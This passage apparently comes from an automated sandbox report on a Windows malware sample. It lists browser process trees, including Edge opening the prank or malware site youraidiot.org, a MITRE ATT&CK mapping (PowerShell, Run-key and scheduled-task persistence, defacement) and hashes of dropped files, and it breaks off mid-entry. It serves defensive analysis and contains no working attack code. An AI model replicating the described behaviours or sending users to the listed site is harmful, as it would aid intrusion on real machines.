"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,3213428511552155611,3492693581146350582,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4884 /prefetch:1
10⤵
PID:5836

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,3213428511552155611,3492693581146350582,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5404 /prefetch:1
10⤵
PID:1952

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,3213428511552155611,3492693581146350582,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3500 /prefetch:1
10⤵
PID:684

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,3213428511552155611,3492693581146350582,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1768 /prefetch:1
10⤵
PID:2828

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,3213428511552155611,3492693581146350582,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5820 /prefetch:1
10⤵
PID:1552

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,3213428511552155611,3492693581146350582,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5072 /prefetch:1
10⤵
PID:4892

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,3213428511552155611,3492693581146350582,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4644 /prefetch:1
10⤵
PID:560

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,3213428511552155611,3492693581146350582,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5856 /prefetch:1
10⤵
PID:4648

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,3213428511552155611,3492693581146350582,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4924 /prefetch:1
10⤵
PID:5712

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,3213428511552155611,3492693581146350582,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5912 /prefetch:1
10⤵
PID:1136

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2100,3213428511552155611,3492693581146350582,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3500 /prefetch:8
10⤵
PID:1644

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2100,3213428511552155611,3492693581146350582,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=4664 /prefetch:8
10⤵
- Modifies registry class
PID:1952

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,3213428511552155611,3492693581146350582,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6192 /prefetch:1
10⤵
PID:3208

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://youraidiot.org/
9⤵
PID:1292

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd603e46f8,0x7ffd603e4708,0x7ffd603e4718
10⤵
PID:460

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2936

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffd6fa9ab58,0x7ffd6fa9ab68,0x7ffd6fa9ab78
2⤵
PID:3352

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1788 --field-trial-handle=1956,i,14848099785870467567,4214391022901685842,131072 /prefetch:2
2⤵
PID:4756

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=1956,i,14848099785870467567,4214391022901685842,131072 /prefetch:8
2⤵
PID:3052

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2304 --field-trial-handle=1956,i,14848099785870467567,4214391022901685842,131072 /prefetch:8
2⤵
PID:3256

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3124 --field-trial-handle=1956,i,14848099785870467567,4214391022901685842,131072 /prefetch:1
2⤵
PID:540

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3132 --field-trial-handle=1956,i,14848099785870467567,4214391022901685842,131072 /prefetch:1
2⤵
PID:1864

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4380 --field-trial-handle=1956,i,14848099785870467567,4214391022901685842,131072 /prefetch:1
2⤵
PID:3688

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4544 --field-trial-handle=1956,i,14848099785870467567,4214391022901685842,131072 /prefetch:8
2⤵
PID:2316

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4360 --field-trial-handle=1956,i,14848099785870467567,4214391022901685842,131072 /prefetch:8
2⤵
PID:2292

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4740 --field-trial-handle=1956,i,14848099785870467567,4214391022901685842,131072 /prefetch:8
2⤵
PID:876

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4704 --field-trial-handle=1956,i,14848099785870467567,4214391022901685842,131072 /prefetch:8
2⤵
PID:2464

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5092 --field-trial-handle=1956,i,14848099785870467567,4214391022901685842,131072 /prefetch:8
2⤵
PID:2292

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4708 --field-trial-handle=1956,i,14848099785870467567,4214391022901685842,131072 /prefetch:1
2⤵
PID:5308

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4072 --field-trial-handle=1956,i,14848099785870467567,4214391022901685842,131072 /prefetch:1
2⤵
PID:6040

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1624 --field-trial-handle=1956,i,14848099785870467567,4214391022901685842,131072 /prefetch:2
2⤵
PID:5932

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:2212

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5480

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5644

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x328 0x504
1⤵
PID:5776

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
816B

MD5
17c81fe006737a55d606e3eba5b1902c

SHA1
b03d731c0243125002df0cd6b969c3a68798932b

SHA256
18919b7524cabfed3efc15c0073b0aca7731842574b5ae23031e475d8f3e2006

SHA512
90053c5292557c25c684b193da9220eaf7753ec52788f417cfab8b92c5fa14489b22c07e7b8dc788630cd58d9ae4ca53240422c2084b6e2d1951f7139cb97100

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1
Filesize
264KB

MD5
a4f0ca8928ec21e27d9e6dde7cdc8f68

SHA1
7d0671b29e1389bbdddaa0caf1974c554a70f00f

SHA256
866242bb48c720505bc50478e67f53c7d2715986560ff8d7fee040a049f57043

SHA512
e23c6f7af1ccde9daee635e5a630f6af9a5d030e8708554730d5835af42995f98c1567367eb21d3f13bb8ca72ae2e6eddd02954b1048a88aaa6b670f29976406

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
Filesize
4KB

MD5
f647adf3e7538dd5b2d6164291333fd1

SHA1
857da6bb6713b9e6b53d7ceff80e86145a08550e

SHA256
1dc5c4059234d2b846c3a5a37ef09b8d1190ce54c89862bacf8ccdff3e787de9

SHA512
3bcc74130763b6ac257bad66efcd27e6a7ae921ca80c4433d51f617aa50dce39235da0f8d95f2b62a402d2a11cd81fb3a39ae534abf7e7c80c449e2b7c9c3b95

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
Filesize
4KB

MD5
486ae4cabb2dda7e180ec003eddc0b3b

SHA1
71f40161da5e8c6705c3d6395e5ca71ac0c3da26

SHA256
49ab45a0e6dde599301a17345e6d8d9af8cb58fa33304fb06f5c19202cad58f3

SHA512
568cf7dfc0893b4fa7ee98acbb5a41c08802126f595a667fcf6a760ba5af5649bd2aa69ff33ca18faf07ef2906ed32de0cb983191b8e0678bb21c5b7ab3fe0a2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
Filesize
354B

MD5
d457032ce01f6a245ee0e04ddd41d590

SHA1
2c6086bf6c53cebd1561a85d1bf1cf24af929daa

SHA256
bb8964c7498a805dca65f08089fb12fcd68e4fd09ae46f4758e942392a14c325

SHA512
fa19a740cc75a877c8fed6e09005910948957fa64bf121452faf5649663bd0af628365a2841c04716e2af926ba400d55e4e90d8b36f4408d8bacf7611a842e97

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
Filesize
1KB

MD5
933f950c05e0e54a683a1cfed6653ec1

SHA1
dfc2c0bcdbdb5edab134c84aee21b827718ed342

SHA256
99a81c56badc5533f8235c296e184dc5b0dffaa9219b1acca475a7907dc97964

SHA512
d907ba21572b0154fc66bbbb933f5bbb08e5ec6a4e5e14f3e4326fb69cc57b9aa8d5fc1c08a8936f3c211541008d48eb829e74d5227a0c71457040bb590ad33b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
7KB

MD5
0ddbc012cf319342e0fcc568bd1f4be0

SHA1
6c6332224ac1040bd7cf92cf5f0e73d7ff0ade02

SHA256
398366d6aa73acbc56be8aa630d9d3c3aa0cfd1f6cf46de0bd194054b2aa74a8

SHA512
d505bb741cb4cfd03462a3dcaf535f2482515c40417430326f0f69e1b032cfccd61152b2cb86994ce0a35f60d9ec09943c00a338ac4bc1c8ab4490f5626cb59a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
7KB

MD5
0a23d4f43488c4539daaca356d6e63f1

SHA1
95fdc049267a456c0758c48e5385d554e0b6bade

SHA256
45a3dce616154d807804b3dbae502586ff87a1e45e27bdaa93e0ca07c7d69a12

SHA512
6bb5f38f37d4b6537cd28788ebe3f51c0ecd58ac347cf426e11ecc43dca009f86a269f627ef24a88d5fd45a5351592f8181cef649c96a9a7b04775b52a9c875f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
7KB

MD5
d06713761762df5caa631c3cb2ffebe3

SHA1
cffadb1342e46a3eabeac9d2b12a101b131e5f54

SHA256
739b5ecc237beb568a0563be2638f53276c7080189b95657d56b017d13e0b0a6

SHA512
d5cdd05eb6caee3ba940399f65fff7f20d0756e21b9c45ca554b27f31aa9d458c64b6834f5db7bdf9d7efbfd5cced54ec1591e1a6e42ab36c785b6225d58bce2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
Filesize
16KB

MD5
19512f507684b53c9f20e34b00d0acdd

SHA1
6b6b42d479e984cb6bf6bdd2b604d31b10cf2cce

SHA256
49958e315f41bf7480bf73bf2274e4e35887ec453f5225e1b08602f47aff8c19

SHA512
1de6c761b5ede9864a58277bca18c1db794c51c2f18729c161f5e9b54315b5d83230f768d91b58c8b06ff2ff023ac8f2423d1bb1a59856d3d43337de0975cf08

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
Filesize
120B

MD5
04ea2dd4e19ef9cecf7e95960bf2ec96

SHA1
f4c21873fea99927c0b104cf463624f46bdaab1c

SHA256
d18f7d6226a7af45c514bb0ab312d42d76c47156300d32a9528b4b69c74f508f

SHA512
1fbc9e6b3aa83bc8ec6dedf89b16b53441f3aa6e30f535e0fca71f7a63b0f491dd3ea0ea0fd19672065622ce2d4472a2c50e481913185b6b12755442e922ac82

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
Filesize
260KB

MD5
7dd4b4fbffd82583e2524898dbaf7f12

SHA1
61e82fd8749779f58ebb640398b02fd2dd80baef

SHA256
bc40d19b289ce08ea56aa3d796272d7302fc3f57ff243bbaa6eb3231a2d0778c

SHA512
7b6d1898920f0817851b053032b939bd6fee830df0bad614e782ec1e750644bb0c5ecccffde18910df226e08f91a2e4f606934b49b898686c530b8d590d6bc2f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
Filesize
260KB

MD5
61751172df25b1eb7cded1aa773be5af

SHA1
be8829e27624f9d8b8b8686d8769b85821088f53

SHA256
f20790030b9912cd448b2c515d5f3726c33074cde87240196d317daa689e1209

SHA512
efb978edce30dc1c06edfea180b397096cb37ae6a1559fdddfad14941185eb5ec0e76fa1caf1afc4dfb99df96c455d33d0ec74bb5935f82834e595f6e9440bff

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
ecdc2754d7d2ae862272153aa9b9ca6e

SHA1
c19bed1c6e1c998b9fa93298639ad7961339147d

SHA256
a13d791473f836edcab0e93451ce7b7182efbbc54261b2b5644d319e047a00a7

SHA512
cd4fb81317d540f8b15f1495a381bb6f0f129b8923a7c06e4b5cf777d2625c30304aee6cc68aa20479e08d84e5030b43fbe93e479602400334dfdd7297f702f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
2daa93382bba07cbc40af372d30ec576

SHA1
c5e709dc3e2e4df2ff841fbde3e30170e7428a94

SHA256
1826d2a57b1938c148bf212a47d947ed1bfb26cfc55868931f843ee438117f30

SHA512
65635cb59c81548a9ef8fdb0942331e7f3cd0c30ce1d4dba48aed72dbb27b06511a55d2aeaadfadbbb4b7cb4b2e2772bbabba9603b3f7d9c8b9e4a7fbf3d6b6b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000c
Filesize
202KB

MD5
9901c48297a339c554e405b4fefe7407

SHA1
5182e80bd6d4bb6bb1b7f0752849fe09e4aa330e

SHA256
9a5974509d9692162d491cf45136f072c54ddc650b201336818c76a9f257d4d2

SHA512
b68ef68c4dcc31716ce25d486617f6ef929ddbb8f7030dd4838320e2803dd6dd1c83966b3484d2986b19f3bd866484c5a432f4f6533bb3e72f5c7457a9bb9742

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
96B

MD5
dd1014d607087f6845b53460c9bcc591

SHA1
a63e6d5e9d117e4ff4d148ab0661c88d5f3cdfd2

SHA256
29fdd3bf7bd39be6a97c9323be1712f2fd1f7f439567c2898501faf59f777e74

SHA512
50a9cf11559a209ce29421169edc371dc792bab64ec4c2b85b2ff8dc42a0034a146aa07bd43b1637e6a17e10fe073fb78e09398eb14e7a21e8ce16a4a53a1c20

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
5KB

MD5
a0e82129e7d3ca2a6e13b8e2f92eebc9

SHA1
e772333df44fd46879dd3e100a75cdd76d7e8157

SHA256
be9419bb7e27adf2c833503b7d5cbab51a2cdd3440c379285a2e0238ee74017e

SHA512
c5b379a199dc07fe71726da07cd9a8d1afe474235ba63328cd25ccc2206607278911d72e2ae55a25bd439c9fb4605a6a8dd1f4d553585648baf78458ff22b72d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB

MD5
31360d965ce279210bad626505cdafee

SHA1
2d1fc19874aa454d08d8d0b79dd1d88c0c3fec03

SHA256
a277a77982a1297ca93121f8ff167b1e8c8c944047f33df2be5485473218c2f4

SHA512
990f53da7b0617d3aab109152898fd4c8dd0cc68d0b02d01763e904422cd16bbcad3b6482be1729abc2be69e49a6b4c88e1803da8ebeb9cb57061159a9ef6237

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
7KB

MD5
bdda5cac9c2e30cf535bb6f62607adaf

SHA1
ca772fb6504ac76902a04c4baceef4106e1441b3

SHA256
0866e9d0644fdf4759fc08dbd8635a70b488bbbe452cffad19930c97de38bdde

SHA512
031938fa3f5c2efa06e2d5fe09ff0b60de7d2507ff8b1751164007d8bb1876a4c9eb712d76ff1a5b1fc899d8742d9018b84b5d145466680dca993c3602fd9bde

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
7KB

MD5
1d2f78316fc1aca5a8e21b7efa8031ef

SHA1
160b43c40150e9e88c7205485a987fb5724d1d63

SHA256
ec4e0737137bd4cc7202dd88ac8fa3f14d51f196cf5c68e74d8ed904d4c83215

SHA512
30d78777d54d88949669deed01d2bf93dd91a7d70b13005ac09775c7d6c13d29123f0056203ce704735f3fb45a8a719933a72274cf1db2750ee8f8c641881f77

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
7KB

MD5
3ea1c9d205d19aa01326fc5fb9873d81

SHA1
f2531141c2e1b86949da5c95262c7358169470a4

SHA256
4bab71dbc2e0056fddf09801b4fafb0b751c07d8979e784786c5cde3f456ce2e

SHA512
1661935318c8e30662ada700b682996ee5912e887c02d948e240723907b045a281b685c577b6e1e5cf977f3463c2a00972240566af50ce3ee359e4fbba72ac25

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB

MD5
92d99e701109a00dd8ddb7d92f4ffd35

SHA1
13694254b93db8972877ef330bb00d43f95a7e03

SHA256
5fe786856112bdbd542e3a6be51e434dd8c1186837afa33bb9e354c3ae06b506

SHA512
8a15f89b35a48475e08be4a2eb6177100800619038662b8543bd63c98d28e975757fe3a8a7636ca5cae21546d3e781fe85ca5a9db5f59020b42d4098c64d50f0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
11KB

MD5
6de260dff2fedaa25900b40ceac98a15

SHA1
29c1a6bc387ecf576466339a1955d45f471c4400

SHA256
b7f4fb9f9b16d14f10275593edc59bd80cf45eb80faa82d239c50d8001e055e2

SHA512
04e80d890eb3e57b63aeb5c36bc48936612389592a27045186cd4332dd5b82b3b12a9363eccd4fb262747ade36b968f322d745d1bcce76c6fce1751d4a218492

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
11KB

MD5
cc85a0fea9865c8f4b9d617235b10b90

SHA1
c46b9e302b09400229b26afdf9e6e07b59842f5b

SHA256
2d6bde675d0067ae468795adb62510d647fbf4c02810e2182fd0e827a8d6fa62

SHA512
3289d5dd256fc075f93ec162efe35d142609bcef16b1215c4cbca79423bf62901172f28a839d11fd611c472c1b7cf7ced2e54cfc2e07f9366398040b987ab945

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\dfabfb5b-ccfa-4fb0-b712-da0190734a0a.tmp
Filesize
12KB

MD5
8a7bf44e363adee4062248dd26b28a4d

SHA1
ed4fb06def37c567300f46c7d36a2ca895a49de0

SHA256
ef04eabfc13ebe403046e1d96967582832c21b3cb77969dabb7a013140275a10

SHA512
de2d823e611338a319c49b09aedef7aedfefdce93aa83631ee91af26ce0a29a1b11d4d3042b27d772edf93a22171c5b75cc59d7c33da8f7f72a944a4bd22223b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
53KB

MD5
06ad34f9739c5159b4d92d702545bd49

SHA1
